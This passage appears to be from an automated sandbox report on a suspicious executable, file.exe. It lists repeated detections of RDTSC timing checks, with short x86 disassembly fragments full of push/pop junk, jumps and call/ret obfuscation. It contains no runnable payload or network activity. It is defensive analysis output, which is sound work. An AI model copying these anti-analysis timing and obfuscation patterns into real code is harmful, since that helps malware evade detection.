                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 818991 second address: 818997 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 81AA79 second address: 81AA7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 81AA7D second address: 81AA81 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 81AA81 second address: 81AA87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7DC96D second address: 7DC993 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FECB0CC2D0Bh 0x0000000d jmp 00007FECB0CC2D13h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 81CEDB second address: 81CEEE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007FECB125BFC6h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 81CEEE second address: 81CEF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 81E510 second address: 81E570 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FECB125BFC8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f mov edi, dword ptr [ebp+122D57DCh] 0x00000015 mov si, ax 0x00000018 push 00000000h 0x0000001a xor edi, 03365BA4h 0x00000020 push 00000000h 0x00000022 push 00000000h 0x00000024 push ebx 0x00000025 call 00007FECB125BFC8h 0x0000002a pop ebx 0x0000002b mov dword ptr [esp+04h], ebx 0x0000002f add dword ptr [esp+04h], 00000016h 0x00000037 inc ebx 0x00000038 push ebx 0x00000039 ret 0x0000003a pop ebx 0x0000003b ret 0x0000003c xor esi, dword ptr [ebp+122D368Bh] 0x00000042 xchg eax, ebx 0x00000043 push ecx 0x00000044 jc 00007FECB125BFC8h 0x0000004a pushad 0x0000004b popad 0x0000004c pop ecx 0x0000004d push eax 0x0000004e jc 00007FECB125BFD8h 0x00000054 push eax 0x00000055 push edx 0x00000056 jng 00007FECB125BFC6h 0x0000005c rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 81E570 second address: 81E574 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 81FF58 second address: 81FF67 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FECB125BFC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 81ED93 second address: 81ED9D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007FECB0CC2D06h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8204D4 second address: 8204E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 jns 00007FECB125BFC6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8205A3 second address: 8205A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8205A8 second address: 8205B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007FECB125BFC6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8205B2 second address: 8205B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8205B6 second address: 8205CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jmp 00007FECB125BFCAh 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8206E8 second address: 8206FA instructions: 0x00000000 rdtsc 0x00000002 jns 00007FECB0CC2D08h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 82180D second address: 821812 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8206FA second address: 8206FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 82285F second address: 822869 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FECB125BFC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 82382A second address: 82383C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FECB0CC2D0Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8206FF second address: 820704 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 825608 second address: 82561D instructions: 0x00000000 rdtsc 0x00000002 jns 00007FECB0CC2D06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jp 00007FECB0CC2D06h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 82561D second address: 825621 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8256BF second address: 8256C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8256C5 second address: 8256C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 824711 second address: 824728 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FECB0CC2D13h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 824728 second address: 824755 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007FECB125BFD9h 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d jno 00007FECB125BFC8h 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 82658C second address: 826590 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 826590 second address: 826621 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push ecx 0x0000000d call 00007FECB125BFC8h 0x00000012 pop ecx 0x00000013 mov dword ptr [esp+04h], ecx 0x00000017 add dword ptr [esp+04h], 00000014h 0x0000001f inc ecx 0x00000020 push ecx 0x00000021 ret 0x00000022 pop ecx 0x00000023 ret 0x00000024 push esi 0x00000025 jmp 00007FECB125BFD9h 0x0000002a pop ebx 0x0000002b push 00000000h 0x0000002d mov dword ptr [ebp+122D17CDh], ecx 0x00000033 push 00000000h 0x00000035 push 00000000h 0x00000037 push edi 0x00000038 call 00007FECB125BFC8h 0x0000003d pop edi 0x0000003e mov dword ptr [esp+04h], edi 0x00000042 add dword ptr [esp+04h], 0000001Ah 0x0000004a inc edi 0x0000004b push edi 0x0000004c ret 0x0000004d pop edi 0x0000004e ret 0x0000004f mov bx, 7156h 0x00000053 xchg eax, esi 0x00000054 jmp 00007FECB125BFD0h 0x00000059 push eax 0x0000005a push eax 0x0000005b push edx 0x0000005c jnc 00007FECB125BFCCh 0x00000062 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 82AD80 second address: 82AD84 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 82DEAD second address: 82DEB1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 82DEB1 second address: 82DECF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 nop 0x00000008 mov di, bx 0x0000000b push 00000000h 0x0000000d mov dword ptr [ebp+122D27CFh], eax 0x00000013 push 00000000h 0x00000015 movsx edi, cx 0x00000018 push eax 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 82AF29 second address: 82AF2E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 82C0A5 second address: 82C0C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FECB0CC2D18h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 82B007 second address: 82B02F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FECB125BFD9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c push ecx 0x0000000d pushad 0x0000000e popad 0x0000000f pop ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 push esi 0x00000013 pop esi 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 82D13D second address: 82D14D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FECB0CC2D0Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82FF4C second address: 82FF51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82D14D second address: 82D157 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007FECB0CC2D06h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82F028 second address: 82F02E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82F13C second address: 82F141 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82F141 second address: 82F176 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FECB125BFD7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jc 00007FECB125BFD7h 0x00000012 jmp 00007FECB125BFD1h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82F176 second address: 82F17C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 831081 second address: 831087 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83327D second address: 8332A1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FECB0CC2D15h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push ecx 0x00000011 pushad 0x00000012 popad 0x00000013 pop ecx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8332A1 second address: 8332A6 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8387EA second address: 8387EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 838BC1 second address: 838BC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 838BC7 second address: 838BDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FECB0CC2D11h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 838BDE second address: 838BE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 838BE7 second address: 838C0E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FECB0CC2D16h 0x0000000b popad 0x0000000c push edi 0x0000000d pushad 0x0000000e jnp 00007FECB0CC2D06h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83E3E7 second address: 83E3EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83E4FB second address: 83E51F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FECB0CC2D15h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jnl 00007FECB0CC2D06h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83E630 second address: 83E639 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83E639 second address: 83E646 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 mov eax, dword ptr [eax] 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83E646 second address: 83E64A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83E73E second address: 83E742 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83E742 second address: 83E760 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 mov eax, dword ptr [eax] 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FECB125BFD2h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D29C3 second address: 7D29CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8456AB second address: 8456C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jl 00007FECB125BFC6h 0x0000000e jl 00007FECB125BFC6h 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 845F69 second address: 845F6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D5F76 second address: 7D5F7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84639D second address: 8463C4 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007FECB0CC2D1Ch 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8463C4 second address: 8463CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84650B second address: 846510 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 846510 second address: 84652A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007FECB125BFC6h 0x00000009 jnl 00007FECB125BFC6h 0x0000000f jne 00007FECB125BFC6h 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84652A second address: 84652E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8467FF second address: 846807 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 846807 second address: 84680E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84AE4E second address: 84AE68 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FECB125BFC6h 0x00000008 jne 00007FECB125BFC6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pop esi 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 jne 00007FECB125BFC6h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84AFC4 second address: 84AFD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FECB0CC2D06h 0x0000000a popad 0x0000000b pop eax 0x0000000c jc 00007FECB0CC2D14h 0x00000012 push ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84AFD9 second address: 84AFDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84B7BE second address: 84B7C5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84BA32 second address: 84BA38 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84BA38 second address: 84BA7F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FECB0CC2D17h 0x00000007 jmp 00007FECB0CC2D0Ch 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f pushad 0x00000010 jmp 00007FECB0CC2D0Bh 0x00000015 pushad 0x00000016 popad 0x00000017 jne 00007FECB0CC2D06h 0x0000001d push eax 0x0000001e pop eax 0x0000001f popad 0x00000020 jne 00007FECB0CC2D0Ch 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F8ECB second address: 7F8EDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a jg 00007FECB125BFC6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F8EDD second address: 7F8EE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 push eax 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84AA38 second address: 84AA3D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 850B68 second address: 850B86 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FECB0CC2D18h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 850B86 second address: 850B8A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 850B8A second address: 850B9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FECB0CC2D0Ah 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CF485 second address: 7CF489 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CF489 second address: 7CF49D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a jno 00007FECB0CC2D06h 0x00000010 push edx 0x00000011 pop edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84F9D8 second address: 84F9F6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FECB125BFD4h 0x00000007 jnp 00007FECB125BFC6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 813C7F second address: 813C84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 813C84 second address: 813C8A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 813C8A second address: 7F83EC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 xor dword ptr [ebp+122D27CAh], eax 0x0000000f call dword ptr [ebp+122D1EBDh] 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007FECB0CC2D15h 0x0000001e jg 00007FECB0CC2D06h 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8140B3 second address: 8140BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8140BA second address: 8140E3 instructions: 0x00000000 rdtsc 0x00000002 js 00007FECB0CC2D0Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c push ecx 0x0000000d jmp 00007FECB0CC2D0Dh 0x00000012 pop ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 js 00007FECB0CC2D06h 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81428D second address: 814298 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FECB125BFC6h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 814298 second address: 81429D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81436A second address: 81436F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8143FE second address: 814411 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jl 00007FECB0CC2D0Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 814411 second address: 814415 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 814415 second address: 81441A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
